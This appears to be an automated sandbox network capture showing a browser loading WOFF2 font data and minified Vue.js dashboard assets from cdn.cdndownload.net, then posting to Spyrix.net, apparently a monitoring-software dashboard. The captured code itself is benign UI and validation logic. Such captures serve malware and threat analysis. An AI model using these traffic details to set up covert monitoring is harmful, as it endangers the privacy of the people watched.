                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC3731INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 58 00 10 00 00 00 02 04 48 00 00 a9 f2 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 84 32 1b 82 91 14 1c 9a 08 06 60 3f 53 54 41 54 44 00 95 2a 11 08 0a 84 b7 40 83 c9 72 0b 91 16 00 01 36 02 24 03 a1 38 04 20 05 87 46 07 cd 35 0c 07 5b c9 c3 91 09 e5 c6 76 bf d7 2d 00 20 2d 83 74 1b 02 94 6d 6a 69 d9 e3 f3 5c 60 93 21 98 eb 7b 76 8e da 71 62 a5 de cb 58 c2 8e 59 2d 30 76 30 9e e7 ce 27 c9 fe ff ff ff ff ff 7f 51 b2 90 31 bd ff 90 fb 24 49 40 04 50 51 50 56 b5 b6 db 74 9a 05 44 b3 14 33 8a 62 a8 15 24 2c aa a4 ca 56 35 bd 3b 88 5e 1e fb 9e 62 18 a2 7b 4b 75 a4 3b d5 29 6b b3 59 a5 72 8a e7 18 bb cb 54 4a 99 7b 64 a6 94 8e cb f5 86 9c 7b 64 b1 c6 98 11 37 96 32 dd 8f f7 47 d8 5b cc 98 e4 ac 8f
                                                                                                                                                                                                                                                          Data Ascii: wOF2XH2`?STATD*@r6$8 F5[v- -tmji\`!{vqbXY-0v0'Q1$I@PQPVtD3b$,V5;^b{Ku;)kYrTJ{d{d72G[
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 60 92 86 62 a7 40 be ec c4 00 3d 38 9d 4c 6e 83 2f e1 f4 78 64 2c 41 21 84 05 71 24 04 81 6e 2e c2 da 87 8b e8 b5 7e 65 11 b5 48 76 90 ce 47 79 2b 29 28 74 b6 c7 ba 5c c3 e6 32 40 c4 8c 46 0f c6 39 74 f2 ad 01 c8 46 41 66 af ab ba f1 08 b3 5f 40 3b 65 0e 76 93 ee 73 34 8e 0e ab 8e 67 bf a9 22 9a fa 5e 2f 2e 02 11 75 de 16 e1 27 4a 21 47 52 3d 2d 3d 65 df 20 48 b5 34 4c 9c 28 49 3e a6 af 67 1f 2b 2f 9e 64 04 e5 e3 d8 94 fa 9c 7a 48 5c 87 c3 e2 1d d2 dc 91 27 81 f8 dc d1 df 6d 15 f2 ae da 75 b9 3b 90 b3 b5 f1 2f 1a f3 97 5e 7f eb af be 44 39 d4 f9 51 c9 49 4f 2b a6 e8 cc 72 50 09 57 e2 37 bc 98 bf d7 e7 70 37 18 15 b6 32 c4 a3 6f 7a d8 25 5f ce 93 fe dc 82 96 49 6d be 3c 2e 76 34 e4 d1 1a 02 ba 29 de a0 e9 f7 b6 8b 95 ad 2d a8 b2 8c 8b 0a cf dd b9 0f d9 2e
                                                                                                                                                                                                                                                          Data Ascii: `b@=8Ln/xd,A!q$n.~eHvGy+)(t\2@F9tFAf_@;evs4g"^/.u'J!GR=-=e H4L(I>g+/dzH\'mu;/^D9QIO+rPW7p72oz%_Im<.v4)-.
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 67 9b 5b 6a d5 e8 e4 79 f3 66 7e cf fc 39 f6 19 d6 30 64 a2 6e 9f e5 6f eb b7 42 13 05 d6 6e 8a d4 a4 e4 59 eb ac a5 bb 29 5d 88 a2 4f c7 74 4e 4a d3 3e 31 e7 b3 17 8e b8 d0 76 11 48 6d 5a a1 f3 39 5f 5d 17 a8 9d 93 31 bc 03 19 0d fb 77 c8 53 ae 12 67 d3 97 a9 e5 12 f6 c7 37 0e 47 03 2a 2b 38 42 0f 09 8c 9f 6f 22 48 24 94 ee 24 b7 e8 d3 25 1f e6 17 e6 23 8a 07 7f d5 7c ed 3a ab 4b 4b 8c 9a 66 0e de 67 5e af fa 83 3a c2 b9 ea 69 55 74 f4 90 af 8e 85 55 25 b1 b6 91 f1 0e 00 2b 87 cd 7f bc c9 19 8f 7e 64 3a eb 4b 3f 92 05 7d 59 ff 77 a8 46 8d 4d d7 2d 89 00 f4 e5 e7 01 f7 f2 a2 e3 ec 36 9d 05 7c e3 88 19 18 76 41 74 43 f0 0e 4d 61 8d 2a d9 bf a5 9c 97 8a c4 91 14 2c 2a 8f bb f4 cb 5a d6 77 9f ab c5 5c a7 c5 76 0e 99 a1 8f 61 48 00 ab bf 0d 50 6b e2 40 fd 29
                                                                                                                                                                                                                                                          Data Ascii: g[jyf~90dnoBnY)]OtNJ>1vHmZ9_]1wSg7G*+8Bo"H$$%#|:KKfg^:iUtU%+~d:K?}YwFM-6|vAtCMa*,*Zw\vaHPk@)
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 7c 74 00 94 f8 83 03 01 57 12 6b a5 b4 59 46 97 d1 dd 65 7a 29 e7 95 82 cf 0a 7c 57 ee bd a6 4f 46 e4 f8 80 65 ff 60 3d 12 15 8b 33 e0 15 ff d4 e0 bb 5a 35 9a 34 46 c2 48 5f 9d 66 f5 5a 22 25 5b 1e ed 13 e3 4e 79 94 fd 1b 99 d0 d9 b9 76 3f 24 c7 d6 3b 01 55 18 0b 65 3a 5a 09 12 19 d8 d1 30 d2 c2 24 22 47 44 42 06 a1 42 d0 d0 e1 18 d8 c4 24 64 a4 e2 c4 53 52 51 d0 33 71 73 cd 75 37 c4 bb ed 8e 7b 12 fd eb be 07 52 bd 92 e6 b5 37 d2 65 7a 27 c3 6e fe e7 ab 3e b9 2b 41 a1 9b 72 64 cb 93 af c0 7b 59 3e 78 e8 3f 2f bd e5 a1 88 a7 62 5e 4a f0 94 e2 5a e1 c2 10 8e 19 c6 0c 0b 79 2b b3 d4 67 3e fe e7 ab 9c 9f 0a fe be 58 a6 52 80 2a cb 7d 15 a8 da 4a 35 56 a9 b5 da 77 6b d4 09 52 2f 58 83 b5 1a ad d3 24 44 b3 f5 5a 6c f4 c3 26 6d 36 db a2 c3 56 3f 85 ea 14 a6 4b
                                                                                                                                                                                                                                                          Data Ascii: |tWkYFez)|WOFe`=3Z54FH_fZ"%[Nyv?$;Ue:Z0$"GDBB$dSRQ3qsu7{R7ez'n>+Ard{Y>x?/b^JZy+g>XR*}J5VwkR/X$DZl&m6V?K
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 50 4e a7 93 26 a5 bf 5e 6a 4d 66 13 b4 f6 b3 2d c5 74 ae b8 b4 76 3e 5c 71 d3 52 ab 22 9a f7 68 29 3e 6f 69 77 da 17 9a 52 88 b3 9c 07 33 2d d2 a9 71 30 fb 25 1c d8 f9 c4 6e 2b 9c d5 75 70 bf f6 55 2a ae 66 8c 92 37 3c 52 af 34 e3 99 a1 5f f2 77 d7 fb 4d 11 0d 37 22 d2 85 54 27 5d a7 50 47 16 3b 14 65 84 01 87 1d e8 3c 7a 1f 90 1b 06 35 23 58 2d 63 49 f2 b6 ac 8e 6c 59 35 af 4d 77 44 da 36 9b 6d 0f 5e d1 27 5b d3 c7 31 6c 25 42 29 4d 3d ef 90 9d ef 18 83 0f 73 91 12 c3 8c e5 5c da 89 5b 86 93 fc a5 9c 6d 8f 3e 0f 75 b6 9f 03 95 80 9a a6 1b 07 fa 00 ef 37 29 e5 3d 0b ac 8b 61 7e 4c 76 02 d7 43 38 39 7e 11 8d 13 4a 6d 8f 8a 52 e0 6e c0 14 b3 15 12 20 b4 89 d4 b8 03 a8 77 07 b7 3d d4 16 39 5f 7a f0 5c a4 17 6e 86 a5 97 47 2a 8d 95 14 42 39 8d 38 e9 a7 c4 25
                                                                                                                                                                                                                                                          Data Ascii: PN&^jMf-tv>\qR"h)>oiwR3-q0%n+upU*f7<R4_wM7"T']PG;e<z5#X-cIlY5MwD6m^'[1l%B)M=s\[m>u7)=a~LvC89~JmRn w=9_z\nG*B98%
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC2043INData Raw: 2f eb 5e 0e c5 fb ea 1a eb 70 8b 04 5d 6f c0 7d 8e 1b 9e 7e 66 a1 df e8 e9 11 e7 26 0a 85 9d d9 41 a1 32 58 6b a0 f1 c8 37 2a b1 3e ed fa ae 13 a2 93 0c 80 bb 01 c6 a5 44 61 76 b6 c4 e0 8b cf e8 3e b3 5d fc f7 61 e1 df be 89 36 c7 0e 34 dd 83 24 72 33 7a 19 a3 9c 62 71 b9 3e c3 f0 37 e0 aa 1b 01 37 16 6a b0 2d 0b bd 84 20 97 51 30 1d d8 53 2c 97 f6 15 a3 9e dc f7 e1 3c e3 16 64 df 2e 2a f6 84 96 8b 5d a3 15 eb bd 06 5d ef ea 29 26 12 9b e7 dd 1c 4f 19 c0 ae 49 b7 79 da 3f 74 2f fe 8c 0a 97 bc ed 1a 44 ee d3 fe a1 d1 9e d2 72 b0 e3 14 78 f5 db ce 41 ea 7d fa 53 f0 53 f3 ec 5c 92 c4 19 bc 75 57 a4 69 5d 18 f6 bd 4c 5a 85 66 4c aa 2e ca 06 97 58 d5 97 eb 5d d3 e8 15 4f ce 29 1a 27 4b a9 5e 9c e3 5d 1d c5 4c c9 29 9e 15 57 83 31 4f 2b 69 49 6d af 9b 54 66 c8
                                                                                                                                                                                                                                                          Data Ascii: /^p]o}~f&A2Xk7*>Dav>]a64$r3zbq>77j- Q0S,<d.*]])&OIy?t/DrxA}SS\uWi]LZfL.X]O)'K^]L)W1O+iImTf
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: c3 f2 9c 52 e9 df 70 31 fe 4d d0 46 73 6f ff b9 40 9f 60 28 d1 da c7 9e 62 bd 51 9f af 1b 1c d6 c5 0e 5f 12 51 49 0e 10 d1 35 2c 1c 0f 0c 05 8a a6 89 fc 14 32 9e a7 d3 2b bb 6c 09 f9 fa 9f b7 bb 7f 0e 94 1a 9d 99 b7 db fd a3 81 83 71 39 b4 27 06 3f 5c ae 37 fb 19 a7 53 29 df af f1 9c 79 a2 be 86 0f 82 49 1a 14 47 66 7e ba 28 f0 5d ff 6f ab 35 8c 25 79 86 c2 bf ff 52 4e 78 68 30 c9 25 f1 d6 c2 28 bd d0 45 88 fb 6d 73 1e 69 5d c0 3f 71 88 f4 27 8c 7c f8 74 39 c1 10 62 4a 54 38 5b d2 41 26 63 72 c8 d6 4f 87 5d 9c 3d 1f 7d 3c c3 d0 a8 e5 18 3c b7 d8 0d 27 1a a5 e4 fd 5f 0e f6 59 c8 68 13 d7 60 4a b6 6d e0 bf ed 6e c1 d8 c9 93 c7 e9 b3 98 8f 63 d8 0f d3 cd 1d 93 87 91 e7 76 3b c9 06 bb 42 22 b6 65 f3 00 83 c6 ac 98 e8 8c c4 db f1 da d1 1e 9f 2f 55 f6 fc 3a 8d
                                                                                                                                                                                                                                                          Data Ascii: Rp1MFso@`(bQ_QI5,2+lq9'?\7S)yIGf~(]o5%yRNxh0%(Emsi]?q'|t9bJT8[A&crO]=}<<'_Yh`Jmncv;B"e/U:
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 3c ed da 5d 49 e6 59 b7 73 49 e5 e9 e7 7f 8c a4 93 42 b2 f2 93 ed 62 81 d9 cb 49 38 44 0f a7 b7 63 5f 8f f9 0c 5f 36 5c fa 91 13 f5 09 44 29 59 14 65 ec 9f d0 7f 7e 59 dc df d4 0b 44 0a 63 36 68 72 09 74 80 bf 13 43 53 c9 42 71 f2 71 3b 3a 7c 69 a8 fd f8 de 6c 5f be fe fe b0 8a 02 85 56 93 1f ca f1 57 22 9e 6f d6 8f bb c7 5b 03 2f d2 5a ae 9a 95 4c 8e f6 30 57 76 c2 4b c2 cb 0e 77 26 4d b0 a8 4a c9 d4 36 76 7f fa 1d 73 fd ee 18 de 74 d3 6e 45 de 8c 1b e7 44 5a c2 82 ad d7 68 65 94 2d d4 b2 d0 a7 37 b7 b2 74 a2 7d 6f 66 ca f3 76 7b 47 f3 85 bb cd f5 77 a6 df 87 64 53 71 40 77 f0 e9 d9 cc e1 70 40 28 10 cd a1 95 cd 53 32 ee a0 f0 e9 88 77 58 b5 43 56 da 34 ef e7 07 c0 f8 a8 94 b8 85 f6 a7 23 c3 37 27 d5 95 fe 1a 1f 27 a3 cf 2a 5b a4 77 82 22 fb a9 94 03 c8
                                                                                                                                                                                                                                                          Data Ascii: <]IYsIBbI8Dc__6\D)Ye~YDc6hrtCSBqq;:|il_VW"o[/ZL0WvKw&MJ6vstnEDZhe-7t}ofv{GwdSq@wp@(S2wXCV4#7''*[w"
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: eb 0c a9 c4 c7 08 dd a1 d0 cc 2c 28 ab b4 67 23 2f 06 1f bd b8 69 18 63 cf 2d 9c 7b f1 41 d1 1c eb e9 e0 8c 1e ae d6 a3 e2 ab b6 f7 e5 97 ce 0b 7e ee 36 bb f8 e1 85 72 b6 26 b4 b4 e7 09 56 2f 4c 08 83 66 65 52 2b 26 8f 74 8a 03 f8 7d 92 79 20 e4 00 7d 4b 4d 11 25 39 5a 40 49 2e aa d9 82 6d dd 42 3b 5c 7d c7 41 e1 f3 ed f0 1d db e1 c1 2d 87 f1 c3 d5 8d 50 52 74 34 9c d4 d4 be 85 be a5 9f be b5 d7 1c 6a 34 df 49 bd 5d bd e5 c4 ab 76 ee 6f 1c 13 3f 9a 63 fa 8d cb fd 97 63 8a e6 7f b6 79 60 35 06 1d 21 e7 56 5a 86 d4 e1 16 64 40 ea f8 90 7c 3c 0f 33 c8 ee 5e 40 21 c9 bd ea 5a 28 8f 98 5b e8 d2 aa 0b aa 95 d6 a1 09 19 e4 23 dd f1 a0 93 91 ba aa 0a 77 fd b5 62 9c d7 27 f9 84 9d 24 33 38 54 22 d6 81 e4 7a b8 98 94 9b 97 a4 51 e7 54 c4 9b fc 39 79 e4 23 e0 13 1d
                                                                                                                                                                                                                                                          Data Ascii: ,(g#/ic-{A~6r&V/LfeR+&t}y }KM%9Z@I.mB;\}A-PRt4j4I]vo?ccy`5!VZd@|<3^@!Z([#wb'$38T"zQT9y#
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC4096INData Raw: 36 01 9a 52 33 74 77 2d 81 83 ab de 5d 8e 19 3b c8 62 3f 1b 6b 2c 78 0d 7e 67 df 2d 55 02 1d bb da c8 67 95 a5 58 48 1e 05 9b 1f 75 57 51 40 ee 0f c1 db 8c fa a3 82 5f a7 d0 ca 60 a4 fb 3f 35 09 2f a4 6a c8 00 d6 98 6a d2 8b 90 11 d1 6c 22 f4 20 3d 25 74 60 ad 6b a3 5e 4c 9d a4 26 5e 4a e9 e8 80 b1 3c c6 5c 42 88 60 2f e4 61 e4 03 28 72 18 e2 b3 cd 06 be 00 f8 7d 26 68 a8 51 52 f5 9d db e6 bb 6a 3a fb de 6a 42 af 5e bc e6 ad 10 62 d3 cb 6c 95 a2 27 9c 4e 07 51 8a eb 5d 49 09 2f df e2 9a 2b 18 f7 c1 af ab 52 5a e7 d4 96 9c 00 44 94 ef 91 13 25 b5 73 52 5a 57 fd fa 80 8b 5d 01 c4 f4 6a bd d4 d7 b5 ec c8 8f 9d 6d 7c 45 ca 88 93 bf 3f e0 85 5e 05 6c ec b7 6c 72 d2 d4 06 ed 98 e6 43 67 e3 b4 c7 8d 4d 4b 5b 75 59 0d c6 f6 ee 83 fb d8 e8 71 c0 b9 19 19 47 5c fb
                                                                                                                                                                                                                                                          Data Ascii: 6R3tw-];b?k,x~g-UgXHuWQ@_`?5/jjl" =%t`k^L&^J<\B`/a(r}&hQRj:jB^bl'NQ]I/+RZD%sRZW]jm|E?^llrCgMK[uYqG\


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          57192.168.2.75507395.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC420OUTGET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:33 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 796
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-31c"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:20:37+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc234
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC796INData Raw: 69 6d 70 6f 72 74 7b 64 2c 67 20 61 73 20 63 2c 63 20 61 73 20 73 2c 6f 20 61 73 20 66 2c 62 20 61 73 20 6d 2c 68 20 61 73 20 70 2c 6e 2c 75 20 61 73 20 61 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 54 65 78 74 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 61 36 36 34 35 34 32 64 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 6f 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 54 65 78 74 2e 6d 6f 64 75 6c 65 2d 63 37 36 39 62 39 61 65 2e 6a 73 22 3b 63 6f 6e 73 74 20 62 3d 64 28 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 54 65 78 74 22 2c 70 72 6f 70 73 3a 7b 77 68 69 74 65 53 70 61 63 65 3a
                                                                                                                                                                                                                                                          Data Ascii: import{d,g as c,c as s,o as f,b as m,h as p,n,u as a}from"./index-004f4025.js";import{_ as x}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";import{c as o}from"./ButtonText.module-c769b9ae.js";const b=d({__name:"ButtonText",props:{whiteSpace:


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          58192.168.2.75507295.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC415OUTGET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:33 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 3702
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-e76"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T12:11:19+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc91
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC3702INData Raw: 69 6d 70 6f 72 74 20 42 20 66 72 6f 6d 22 2e 2f 6c 6f 6f 70 2d 63 34 35 66 30 66 31 65 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 64 20 61 73 20 62 2c 6d 20 61 73 20 69 2c 61 69 20 61 73 20 77 2c 63 20 61 73 20 64 2c 6f 20 61 73 20 75 2c 62 20 61 73 20 68 2c 69 20 61 73 20 66 2c 6e 20 61 73 20 6f 2c 75 20 61 73 20 61 2c 68 20 61 73 20 70 2c 55 20 61 73 20 76 2c 7a 20 61 73 20 6d 2c 65 20 61 73 20 43 2c 79 20 61 73 20 49 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 35 36 65 64 66 35 61 36 2e 6a 73 22 3b 63 6f 6e 73 74 20 57 3d 22 2d 7a 74
                                                                                                                                                                                                                                                          Data Ascii: import B from"./loop-c45f0f1e.js";import{d as b,m as i,ai as w,c as d,o as u,b as h,i as f,n as o,u as a,h as p,U as v,z as m,e as C,y as I}from"./index-004f4025.js";import{_ as E}from"./Button.vue_vue_type_script_setup_true_lang-56edf5a6.js";const W="-zt


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          59192.168.2.75507495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC387OUTGET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:32 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 838
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-346"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:50:39+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc70
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC838INData Raw: 69 6d 70 6f 72 74 7b 61 63 20 61 73 20 6e 2c 6d 20 61 73 20 69 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 64 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 74 7d 3d 6e 3b 72 65 74 75 72 6e 20 65 2e 69 6e 63 6c 75 64 65 73 28 22 40 22 29 26 26 65 2e 69 6e 63 6c 75 64 65 73 28 22 2e 22 29 3f 22 22 3a 74 28 22 50 6c 65 61 73 65 20 65 6e 74 65 72 20 61 20 76 61 6c 69 64 20 65 2d 6d 61 69 6c 20 61 64 64 72 65 73 73 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 63 6f 6e 73 74 7b 74 7d 3d 6e 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3c 3d 31 38 30 3f 22 22 3a 74 28 22 54 68 65 20 66 69 65 6c 64 20 6d 75 73 74 20 63 6f 6e 74 61 69 6e 20 6c 65 73 73 20 74 68 61 6e 20 31 38 30 20 63 68 61 72 61 63 74 65 72 73
                                                                                                                                                                                                                                                          Data Ascii: import{ac as n,m as i}from"./index-004f4025.js";const d=e=>{const{t}=n;return e.includes("@")&&e.includes(".")?"":t("Please enter a valid e-mail address")};function m(e){const{t}=n;return e.length<=180?"":t("The field must contain less than 180 characters


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          60192.168.2.75507595.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC378OUTGET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:33 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 523
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-20b"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T20:40:31+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc229
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:33 UTC523INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 65 2c 62 20 61 73 20 6f 2c 69 20 61 73 20 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 73 3d 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 6e 3d 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 2e 37 32 20 31 33 2e 34 33 34 68 2d 2e 36 37 37 6c 2d 2e 32 34 2d 2e 32 33 32 61 35 2e 35 35 20 35 2e 35 35 20 30 20 30 20 30 20 31 2e 33 34 36 2d 33 2e 36 32 37 20 35 2e 35 37 34 20 35 2e 35 37 34 20 30 20 31 20 30 2d 35 2e 35 37 34 20 35 2e 35 37 34 20 35 2e 35 35 20 35 2e 35 35 20 30 20 30 20 30 20 33 2e 36 32 37 2d 31 2e 33 34 36 6c 2e 32 33 32 2e
                                                                                                                                                                                                                                                          Data Ascii: import{o as e,b as o,i as t}from"./index-004f4025.js";const s={xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},n=t("path",{d:"M14.72 13.434h-.677l-.24-.232a5.55 5.55 0 0 0 1.346-3.627 5.574 5.574 0 1 0-5.574 5.574 5.55 5.55 0 0 0 3.627-1.346l.232.


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          61192.168.2.755076158.69.117.119443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:36 UTC163OUTPOST /dashboard/prg-list HTTP/1.1
                                                                                                                                                                                                                                                          Host: Spyrix.net
